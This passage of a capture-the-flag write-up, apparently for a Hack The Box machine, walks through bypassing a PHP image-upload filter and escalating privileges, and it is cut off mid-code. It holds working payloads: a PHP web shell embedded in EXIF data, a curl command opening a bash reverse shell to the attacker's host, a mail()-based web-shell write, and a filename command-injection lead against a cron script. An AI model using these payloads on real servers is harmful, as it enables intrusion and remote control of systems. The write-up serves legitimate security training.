class=\"language-text\">!empty($_FILES[\"myFile\"]</code></li>\n<li><code class=\"language-text\">!(check_file_type($_FILES[\"myFile\"]) &amp;&amp; filesize($_FILES['myFile']['tmp_name']) &lt; 60000)</code></li>\n<li><code class=\"language-text\">substr_compare($myFile[\"name\"], $vext, -strlen($vext)) === 0</code></li>\n</ul>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token punctuation\">,</span><span class=\"token string single-quoted-string\">'_'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'REMOTE_ADDR'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token operator\">.</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token operator\">.</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$success</span> <span class=\"token operator\">=</span> <span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"tmp_name\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">UPLOAD_DIR</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">chmod</span><span class=\"token punctuation\">(</span><span class=\"token constant\">UPLOAD_DIR</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0644</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>I’ll work on bypassing these.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token keyword\">function</span> <span class=\"token function-definition function\">file_mime_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token variable\">$regexp</span> <span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">'/^([a-z\\-]+\\/[a-z0-9\\-\\.\\+]+)(;\\s.+)?$/'</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">function_exists</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'finfo_file'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$finfo</span> <span class=\"token operator\">=</span> <span class=\"token function\">finfo_open</span><span class=\"token punctuation\">(</span><span class=\"token constant\">FILEINFO_MIME</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">is_resource</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$finfo</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token comment\">// It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system</span>\n    <span class=\"token punctuation\">{</span>\n      <span class=\"token variable\">$mime</span> <span class=\"token operator\">=</span> @<span class=\"token function\">finfo_file</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$finfo</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$file</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'tmp_name'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">finfo_close</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$finfo</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">is_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$mime</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">preg_match</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$regexp</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$mime</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$matches</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token variable\">$file_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$matches</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">return</span> <span class=\"token variable\">$file_type</span><span class=\"token punctuation\">;</span>\n      <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">function_exists</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'mime_content_type'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$file_type</span> <span class=\"token operator\">=</span> @<span class=\"token function\">mime_content_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'tmp_name'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file_type</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token comment\">// It's possible that mime_content_type() returns FALSE or an empty string</span>\n    <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">return</span> <span class=\"token variable\">$file_type</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token variable\">$file</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'type'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">function</span> <span class=\"token function-definition function\">check_file_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token variable\">$mime_type</span> <span class=\"token operator\">=</span> <span class=\"token function\">file_mime_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strpos</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$mime_type</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'image/'</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">===</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">return</span> <span class=\"token constant boolean\">true</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">return</span> <span class=\"token constant boolean\">false</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>  \n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Actually running it helps understand the behavior.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">php -S <span class=\"token number\">127.0</span>.0.1:8080</code></pre></div>\n<h3 id=\"embedding-a-php-script-in-an-image-file-using-exiftool\" style=\"position:relative;\"><a href=\"#embedding-a-php-script-in-an-image-file-using-exiftool\" aria-label=\"embedding a php script in an image file using exiftool permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Embedding a PHP Script in an Image File Using exiftool</h3>\n<p>I found that to upload the script, I first need to bypass the MIME type check here:</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token variable\">$mime_type</span> <span class=\"token operator\">=</span> <span class=\"token function\">file_mime_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strpos</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$mime_type</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'image/'</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">===</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>I embedded a command using the following:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># For testing</span>\nexiftool -documentname<span class=\"token operator\">=</span><span class=\"token string\">'&lt;?php echo \"foobarbaz\"; ?>'</span> test.jpg\n<span class=\"token function\">mv</span> test.jpg test.php.jpg\n\nexiftool -documentname<span class=\"token operator\">=</span><span class=\"token string\">'&lt;?php system($_GET['</span>cmd<span class=\"token string\">']); ?>'</span> test.jpg\n<span class=\"token function\">mv</span> test.jpg test.php.jpg\n\n<span class=\"token comment\">###############</span>\n$ <span class=\"token function\">file</span> test.php.jpg \ntest.php.jpg: JPEG image data, JFIF standard <span class=\"token number\">1.01</span>, aspect ratio, density 1x1, segment length <span class=\"token number\">16</span>, comment: <span class=\"token string\">\"&lt;?php system(['cmd']); ?>\"</span>, baseline, precision <span class=\"token number\">8</span>, 1x30, components <span class=\"token number\">3</span></code></pre></div>\n<p>Reference: <a href=\"https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Bypass File Upload Filtering · Total OSCP Guide</a></p>\n<p>Reference: <a href=\"https://book.hacktricks.xyz/pentesting-web/file-upload\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">File Upload - HackTricks</a></p>\n<p>After uploading this file, I can get a reverse shell by connecting to the server with the following query:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">curl</span> -G --data-urlencode <span class=\"token string\">\"cmd=bash -c '/bin/bash -l > /dev/tcp/10.10.14.2/4444 0&lt;&amp;1 2>&amp;1'\"</span> http://10.10.10.146/uploads/10_10_14_2.php.jpg <span class=\"token operator\">|</span> <span class=\"token function\">cat</span></code></pre></div>\n<p>However, since the web server user privileges don’t allow me to access the flag, I need to continue enumerating internally.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">whoami</span>\napache\n\n$ <span class=\"token function\">ls</span> /home/guly\ncheck_attack.php\ncrontab.guly\nuser.txt\n\n$ <span class=\"token function\">cat</span> user.txt\ncat: user.txt: Permission denied</code></pre></div>\n<p> By the way, after checking a writeup, it seems RCE is also possible without embedding into exif data:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">oot@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># cp original.png ./test.png</span>\nroot@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># echo '&lt;?php' >> test.png</span>\nroot@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># echo 'passthru(\"whoami\");' >> test.png</span>\nroot@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># echo '?>' >> test.png</span>\nroot@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># mv test.png test.php.png</span></code></pre></div>\n<h3 id=\"obtaining-user-privileges\" style=\"position:relative;\"><a href=\"#obtaining-user-privileges\" aria-label=\"obtaining user privileges permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Obtaining User Privileges</h3>\n<p>Exploring internally, I found <code class=\"language-text\">check_attack.php</code> and a crontab running with user privileges.</p>\n<p>The following cron runs <code class=\"language-text\">check_attack.php</code> with guly’s privileges every 3 minutes:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">cat</span> crontab.guly\n*/3 * * * * php /home/guly/check_attack.php</code></pre></div>\n<p>Since this script runs as the user via cron, I might be able to get a shell if I can achieve RCE through it.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"># check_attack.php\n<span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span>\n<span class=\"token keyword\">require</span> <span class=\"token string single-quoted-string\">'/var/www/html/lib.php'</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$path</span> <span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">'/var/www/html/uploads/'</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$logpath</span> <span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">'/tmp/attack.log'</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$to</span> <span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">'guly'</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$msg</span><span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">''</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$headers</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"X-Mailer: check_attack.php\\r\\n\"</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token variable\">$files</span> <span class=\"token operator\">=</span> <span class=\"token keyword\">array</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$files</span> <span class=\"token operator\">=</span> <span class=\"token function\">preg_grep</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'/^([^.])/'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">scandir</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$path</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">foreach</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$files</span> <span class=\"token keyword\">as</span> <span class=\"token variable\">$key</span> <span class=\"token operator\">=></span> <span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token variable\">$msg</span><span class=\"token operator\">=</span><span class=\"token string single-quoted-string\">''</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$value</span> <span class=\"token operator\">==</span> <span class=\"token string single-quoted-string\">'index.html'</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">continue</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token comment\">#echo \"-------------\\n\";</span>\n\n  <span class=\"token comment\">#print \"check: $value\\n\";</span>\n  <span class=\"token keyword\">list</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> <span class=\"token function\">getnameCheck</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$check</span> <span class=\"token operator\">=</span> <span class=\"token function\">check_ip</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$check</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"attack!\\n\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token comment\"># todo: attach file</span>\n    <span class=\"token function\">file_put_contents</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$logpath</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">FILE_APPEND</span> <span class=\"token operator\">|</span> <span class=\"token class-name\">LOCK_EX</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$logpath</span></span>\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"nohup /bin/rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span> > /dev/null 2>&amp;1 &amp;\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\\n\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">mail</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$to</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$headers</span><span class=\"token punctuation\">,</span> <span class=\"token string double-quoted-string\">\"-F<span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>The code roughly performs the following:</p>\n<ol>\n<li>Split the uploaded file into its extension and filename</li>\n<li>Check whether the filename matches the format of an IP address</li>\n<li>If the filename is malformed, log it and send an email via the mail function</li>\n</ol>\n<p>Here is the relevant code collected:</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token keyword\">function</span> <span class=\"token function-definition function\">getnameCheck</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$filename</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token variable\">$pieces</span> <span class=\"token operator\">=</span> <span class=\"token function\">explode</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$filename</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$name</span><span class=\"token operator\">=</span> <span class=\"token function\">array_shift</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$pieces</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'_'</span><span class=\"token punctuation\">,</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">implode</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$pieces</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token comment\">#echo \"name $name - ext $ext\\n\";</span>\n  <span class=\"token keyword\">return</span> <span class=\"token keyword\">array</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">function</span> <span class=\"token function-definition function\">check_ip</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$prefix</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$filename</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token comment\">//echo \"prefix: $prefix - fname: $filename&lt;br>\\n\";</span>\n  <span class=\"token variable\">$ret</span> <span class=\"token operator\">=</span> <span class=\"token constant boolean\">true</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token function\">filter_var</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$prefix</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">FILTER_VALIDATE_IP</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$ret</span> <span class=\"token operator\">=</span> <span class=\"token constant boolean\">false</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$msg</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"4tt4ck on file \"</span><span class=\"token operator\">.</span><span class=\"token variable\">$filename</span><span class=\"token operator\">.</span><span class=\"token string double-quoted-string\">\": prefix is not a valid ip \"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$msg</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$filename</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token keyword\">array</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$ret</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$msg</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token keyword\">list</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> <span class=\"token function\">getnameCheck</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$check</span> <span class=\"token operator\">=</span> <span class=\"token function\">check_ip</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$check</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"attack!\\n\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token comment\"># todo: attach file</span>\n  <span class=\"token function\">file_put_contents</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$logpath</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">FILE_APPEND</span> <span class=\"token operator\">|</span> <span class=\"token class-name\">LOCK_EX</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$logpath</span></span>\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"nohup /bin/rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span> > /dev/null 2>&amp;1 &amp;\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\\n\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">mail</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$to</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$headers</span><span class=\"token punctuation\">,</span> <span class=\"token string double-quoted-string\">\"-F<span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Reference: <a href=\"https://webkaru.net/php/function-file-put-contents/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PHP Function - Write String to File - file<em>put</em>contents() - PHP Beginner’s Guide Karma</a></p>\n<p>Reference: <a href=\"https://www.php.net/manual/en/function.mail.php\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PHP: mail - Manual</a></p>\n<p>Reference: <a href=\"https://www.w3schools.com/php/phptryit.asp?filename=tryphp_func_string_implode\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PHP Tryit Editor v1.2</a></p>\n<p>Here, if we can control the 5th argument of PHP’s <code class=\"language-text\">mail</code> function, we might be able to get a reverse shell via RCE.</p>\n<p>Using the <code class=\"language-text\">-X</code> option in the 5th argument of <code class=\"language-text\">mail</code> allows writing logs to an arbitrary file, so it’s possible to achieve RCE by injecting a script into something like <code class=\"language-text\">/var/www/html/rce.php</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\">$to = 'a@b.c';\n$subject = '<span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span> <span class=\"token function\">system</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"cmd\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token delimiter important\">?></span></span>';\n$message = '';\n$headers = '';\n$options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php';\nmail($to, $subject, $message, $headers, $options);</code></pre></div>\n<p>Reference: <a href=\"https://www.saotn.org/exploit-phps-mail-get-remote-code-execution/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Exploit PHP’s mail() to get remote code execution - Sysadmins of the North</a></p>\n<p>However, the method in the above article doesn’t seem to give a <code class=\"language-text\">guly</code> shell, so another approach is needed to execute commands from within <code class=\"language-text\">check_attack.php</code>.</p>\n<p>I searched for mail function vulnerabilities for a while but couldn’t find a way to execute commands from <code class=\"language-text\">check_attack.php</code>.</p>\n<p>Shifting perspective to look a few lines earlier, I noticed a line that directly embeds <code class=\"language-text\">$path$value</code> into the <code class=\"language-text\">exec</code> function.</p>\n<p>Since <code class=\"language-text\">$value</code> can be freely overwritten via the filename, this line appears to have a command injection vulnerability.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$logpath</span></span>\"</span><span class=\"token 